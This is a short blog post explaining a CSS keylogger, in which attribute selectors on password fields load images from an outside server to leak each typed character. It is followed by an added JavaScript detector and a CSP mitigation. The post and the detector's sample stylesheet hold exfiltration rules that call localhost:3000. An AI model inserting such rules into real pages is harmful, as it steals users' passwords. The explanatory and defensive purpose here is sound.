CSS Hacking: The Surprise of February

By: Joeri Jungschlager

March 4, 2018

To some it may have popped up earlier than 2018, but for me it was quite new. I walked into the office after a week of teaching children how to code. Given the age group, the choice of HTML & CSS was more than acceptable. But to my surprise, I may have gotten them way closer to writing their first sort of keylogger than I thought. A few of the kids who had been accelerating over the past 4 days took their first steps with JavaScript and Angular. But even without JavaScript knowledge, it is possible to log keys. The method is very creative. I am going to show the method, which I found on GitHub. There are a few things to keep in mind first.

  1. It's not system-wide.

  2. It is also really specific about what data you can obtain with this method.

  3. It is still dangerous: data like passwords and credit card numbers can be stolen.

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following CSS will select all inputs with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

The CSS code:

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
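A defensive check for the pattern above, as an added example that is not from the original post or the GitHub project it refers to: it scans stylesheet text for rules that combine a `value` attribute selector with a `url()` pointing at another origin. `PAGE_ORIGIN`, `findExfilRules` and the sample stylesheet are assumptions constructed for illustration.

```javascript
// Added example: flag CSS rules that pair a value-attribute selector with a
// url() on a different origin. PAGE_ORIGIN is a hypothetical site origin.
const PAGE_ORIGIN = "https://app.example";

// Matches [value="x"], [value^="x"], [value$="x"], [value*="x"], etc.
const VALUE_SELECTOR = /\[\s*value\s*[~|^$*]?=/i;
const URL_FN = /url\(\s*(['"]?)(.*?)\1\s*\)/gi;

function findExfilRules(cssText, pageOrigin = PAGE_ORIGIN) {
  const findings = [];
  // Strip comments, then walk "selector { declarations }" pairs.
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selector = m[1].trim();
    if (!VALUE_SELECTOR.test(selector)) continue;
    for (const u of m[2].matchAll(URL_FN)) {
      let target;
      try {
        target = new URL(u[2], pageOrigin); // resolves relative URLs too
      } catch {
        continue; // unparsable URL, nothing to report
      }
      // data: and similar schemes trigger no network request.
      if (!/^https?:$/.test(target.protocol)) continue;
      if (target.origin !== pageOrigin) {
        findings.push({ selector, url: target.href });
      }
    }
  }
  return findings;
}

// Constructed sample: two rules in the style shown above, two benign rules.
const SAMPLE_CSS = `
/* constructed sample */
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
input[type="password"][value$="b"] { background-image: url(http://localhost:3000/b); }
input[type="text"] { background-image: url("/img/search.png"); }
input[value=""] { background-image: url("/img/placeholder.png"); }
`;

console.log(findExfilRules(SAMPLE_CSS));
```

In the browser, a Content-Security-Policy whose `img-src` excludes untrusted origins stops the `background-image` request itself.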